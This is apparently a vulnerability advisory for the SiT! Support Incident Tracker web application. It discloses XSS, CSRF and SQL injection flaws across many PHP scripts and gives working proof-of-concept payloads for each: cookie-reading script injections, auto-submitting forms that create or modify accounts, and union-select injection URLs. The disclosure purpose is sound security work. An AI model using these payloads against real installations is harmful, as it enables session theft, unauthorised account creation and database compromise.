High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in SiT! Support Incident Tracker, which can be exploited to perform cross-site scripting, cross-site request forgery and SQL injection attacks.
1) Cross-site scripting (XSS) vulnerabilities in SiT! Support Incident Tracker: CVE-2011-5073
1.1 The vulnerability exists due to input sanitation error in the "table1" HTTP POST parameter in report_customers.php, report_incidents_by_engineer.php, report_incidents_by_site.php and report_marketing.php. A remote attacker can send a specially crafted HTTP POST request to the vulnerable script and execute arbitrary HTML and script code in user`s browser in context of the vulnerable website.
Exploitation examples:
1.
<form action="http://[host]/report_customers.php" method="post">
<input type="hidden" name="table1" value="'><script>alert(document.cookie);</script>">
<input type="submit" value="exploit">
</form>
2.
<form action="http://[host]/report_incidents_by_engineer.php" method="post">
<input type="hidden" name="table1" value="'><script>alert(document.cookie);</script>">
<input type="submit" value="exploit">
</form>
3.
<form action="http://[host]/report_incidents_by_site.php" method="post">
<input type="hidden" name="table1" value="'><script>alert(document.cookie);</script>">
<input type="submit" value="exploit">
</form>
4.
<form action="http://[host]/report_marketing.php" method="post">
<input type="hidden" name="table1" value="'><script>alert(document.cookie);</script>">
<input type="submit" value="exploit">
</form>
1.2 The vulnerability exists due to input sanitation error in the "startdate" and "enddate" parameters in report_incidents_by_vendor.php (when "mode" is set). A remote attacker can send a specially crafted HTTP request to the vulnerable script and execute arbitrary HTML and script code in user`s browser in context of the vulnerable website.
Exploitation example:
http://[host]/report_incidents_by_vendor.php?mode=1&startdate=%3Cscript%3Eal ert%281%29;%3C/script%3E&enddate=%3Cscript%3Ealert%282%29;%3C/script%3E
1.3 The vulnerability exists due to input sanitation error in the HTTP Referer header in billable_incidents.php (when "mode" is set to "approvalpage" and "output" is set to "html"), transactions.php (when "display" is set to "html") and forgotpwd.php. A remote attacker can send a specially crafted HTTP request to the vulnerable script and execute arbitrary HTML and script code in user`s browser in context of the vulnerable website.
Exploitation example:
1.
GET /billable_incidents.php?mode=approvalpage&output=html HTTP/1.1
Referer: '><script>alert(document.cookie);</script>
2.
GET /transactions.php?display=html HTTP/1.1
Referer: '><script>alert(document.cookie);</script>
3.
GET /forgotpwd.php?userid=1&action=sendpwd HTTP/1.1
Referer: '<script>alert(document.cookie);</script>
1.4 The vulnerability exists due to input sanitation error in the "mode" parameter in contact_support.php. A remote attacker can send a specially crafted HTTP request to the vulnerable script and execute arbitrary HTML and script code in user`s browser in context of the vulnerable website.
Exploitation example:
http://[host]/contact_support.php?mode=1%22%3E%3Cscript%3Ealert%28document.c ookie%29;%3C/script%3E
1.5 The vulnerability exists due to input sanitation error in the "contractid" parameter in contract_add_service.php. A remote attacker can send a specially crafted HTTP request to the vulnerable script and execute arbitrary HTML and script code in user`s browser in context of the vulnerable website.
Exploitation example:
http://[host]/contract_add_service.php?contractid=%22%3E%3Cscript%3Ealert%28 document.cookie%29;%3C/script%3E
1.6 The vulnerability exists due to input sanitation error in the "user" parameter in edit_backup_users.php. A remote attacker can send a specially crafted HTTP request to the vulnerable script and execute arbitrary HTML and script code in user`s browser in context of the vulnerable website.
Exploitation example:
http://[host]/edit_backup_users.php?user=%27%3E%3Cscript%3Ealert%28document. cookie%29;%3C/script%3E
1.7 The vulnerability exists due to input sanitation error in the "id" parameter in edit_escalation_path.php. A remote attacker can send a specially crafted HTTP request to the vulnerable script and execute arbitrary HTML and script code in user`s browser in context of the vulnerable website.
Exploitation example:
http://[host]/edit_escalation_path.php?id=%22%3E%3Cscript%3Ealert%28document .cookie%29;%3C/script%3E
1.8 The vulnerability exists due to input sanitation error in the "action" parameter in inbox.php. A remote attacker can send a specially crafted HTTP request to the vulnerable script and execute arbitrary HTML and script code in user`s browser in context of the vulnerable website.
Exploitation example:
http://[host]/inbox.php?action=%3Cscript%3Ealert%28document.cookie%29;%3C/sc ript%3E
1.9 The vulnerability exists due to input sanitation error in the "search_string" parameter in incident_add.php (when "action" is set to "findcontact"). A remote attacker can send a specially crafted HTTP request to the vulnerable script and execute arbitrary HTML and script code in user`s browser in context of the vulnerable website.
Exploitation example:
http://[host]/incident_add.php?action=findcontact&search_string=%3Cscript%3E alert%28document.cookie%29;%3C/script%3E
2) Cross-site request forgery (CSRF) in SiT! Support Incident Tracker: CVE-2011-5074
The vulnerability exists due to insufficient validation of the request origin in user_profile_edit.php and user_add.php. A remote attacker can create a specially crafted link, trick a logged-in administrator into following that link and change create or modify arbitrary account within the application.
Exploitation examples:
<form action="http://[host]/user_profile_edit.php" method="post">
<input type="hidden" name="realname" value="realname">
<input type="hidden" name="mode" value="save">
<input type="hidden" name="submit" value="Save">
<input type="hidden" name="email" value="testemail@test.com">
<input type="hidden" name="userid" value="1">
<input type="submit" id="btn">
</form>
<script>
document.getElementById('btn').click();
</script>
<form action="http://[host]/user_add.php" method="post">
<input type="hidden" name="realname" value="testuser">
<input type="hidden" name="username" value="testuser">
<input type="hidden" name="password" value="password">
<input type="hidden" name="groupid" value="0">
<input type="hidden" name="roleid" value="1">
<input type="hidden" name="jobtitle" value="jobtitle">
<input type="hidden" name="email" value="email@email.com">
<input type="hidden" name="submit" value="Add User">
<input type="submit" id="btn">
</form>
<script>
document.getElementById('btn').click();
</script>
3) SQL injection vulnerabilities in SiT! Support Incident Tracker: CVE-2011-5072
3.1 The vulnerability exists due to input sanitation errors in the "start" parameter in portal/kb.php. A remote attacker can send a specially crafted HTTP request to the vulnerable script and execute arbitrary SQL commands in application`s database. Successful exploitation may allow an attacker to read, modify, add or delete arbitrary data in the database.
Exploitation example:
http://[host]/portal/kb.php?start=SQL_CODE_HERE
3.2 The vulnerability exists due to input sanitation errors in the "contractid" parameter in contract_add_service.php. A remote attacker can send a specially crafted HTTP request to the vulnerable script and execute arbitrary SQL commands in application`s database. Successful exploitation may allow an attacker to read, modify, add or delete arbitrary data in the database.
Exploitation example:
http://[host]/contract_add_service.php?contractid=1%20union%20%28select%20mi n%28@a:=1%29from%20%28select%201%20union%20select%202%29k%20group%20by%20%28 select%20concat%28@@version,0x0,@a:=%28@a%2B1%29%2%29%29%29%20+--+
3.4 The vulnerability exists due to input sanitation errors in the "id" parameter in edit_escalation_path.php. A remote attacker can send a specially crafted HTTP request to the vulnerable script and execute arbitrary SQL commands in application`s database. Successful exploitation may allow an attacker to read, modify, add or delete arbitrary data in the database.
Exploitation example:
http://[host]/edit_escalation_path.php?id=-1%20union%20select%201,version%28 %29,user%28%29,4,5,6,7,8,9
3.4 The vulnerability exists due to input sanitation errors in the "unlock" and "lock" parameter in holding_queue.php. A remote attacker can send a specially crafted HTTP request to the vulnerable script and execute arbitrary SQL commands in application`s database. Successful exploitation may allow an attacker to read, modify, add or delete arbitrary data in the database.
Exploitation examples:
http://[host]/holding_queue.php?unlock=%27SQL_CODE_HERE
http://[host]/holding_queue.php?lock=%27SQL_CODE_HERE
3.5 The vulnerability exists due to input sanitation errors in the "selected" parameter in holding_queue.php. A remote attacker can send a specially crafted HTTP POST request to the vulnerable script and execute arbitrary SQL commands in application`s database. Successful exploitation may allow an attacker to read, modify, add or delete arbitrary data in the database.
Exploitation example:
<form action="http://[host]/holding_queue.php" method="post">
<input type="hidden" name="selected[]" value="'SQL_CODE_HERE">
<input type="submit" value="exploit">
</form>
3.6 The vulnerability exists due to input sanitation errors in the "inc" parameter in report_customers.php (when "mode" is set to "report") and report_incidents_by_site.php (when "mode" is set to "report"). A remote attacker can send a specially crafted HTTP request to the vulnerable script and execute arbitrary SQL commands in application`s database. Successful exploitation may allow an attacker to read, modify, add or delete arbitrary data in the database.
Exploitation examples:
<form action="http://[host]/report_customers.php?mode=report" method="post">
<input type="hidden" name="inc[]" value="-1) union select 1,2,3,4,version(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21, 22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,39,40,41,42,43,44,45,46,47,4 8,49,50,51,52,53,54,55,56 -- ">
<input type="hidden" name="output" value="screen">
<input type="submit" value="exploit">
</form>
<form action="http://[host]/report_incidents_by_site.php?mode=report" method="post">
<input type="hidden" name="inc[]" value="-1) union select version(),2,3,4,5,6,7,8,9,10 -- ">
<input type="hidden" name="output" value="screen">
<input type="submit" value="exploit">
</form>
3.7 The vulnerability exists due to input sanitation errors in the "start" parameter in search.php. A remote attacker can send a specially crafted HTTP request to the vulnerable script and execute arbitrary SQL commands in application`s database. Successful exploitation may allow an attacker to read, modify, add or delete arbitrary data in the database.
Exploitation example:
http://[host]/search.php?q=123&domain=incidents&start=SQL_CODE_HERE[code]
3.8 The vulnerability exists due to input sanitation errors in the "sites" parameter in transactions.php. A remote attacker can send a specially crafted HTTP request to the vulnerable script and execute arbitrary SQL commands in application`s database. Successful exploitation may allow an attacker to read, modify, add or delete arbitrary data in the database.
Exploitation example:
[code]http://[host]/transactions.php?sites[]=1%20union%20select%20 1,2,3,4,5,6,7,8,version%28%29,10,11,12,13,14,15,16%20+--+ |
